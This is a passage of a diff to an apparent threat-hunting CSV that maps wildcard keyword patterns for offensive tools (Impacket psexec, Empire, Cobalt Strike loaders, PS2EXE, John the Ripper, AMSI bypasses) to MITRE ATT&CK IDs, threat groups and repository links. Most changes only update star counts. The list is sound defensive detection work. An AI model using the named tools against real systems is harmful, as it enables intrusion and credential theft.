T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*proxychains dcomexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -15255,44 +15423,44 @@ "*proxyshellcodeurl*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxyshell-enumerate.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","","N/A","","","" "*proxyshell-poc*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","","N/A","","","" -"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAmsiScanner.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAttack*","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PSByPassCLM*","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","3","280","45","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z" "*PSconfusion.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ps-empire client*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*ps-empire server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PSEXEC_PSH *","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PsExecLiveImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*PsExecMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*psinject * x64 Invoke-*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*psinject -PID*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*pSNIRFgTuZnCdHN*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" "*PSObfucate.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Pspersist-main*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*PSprofile.cpp*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever 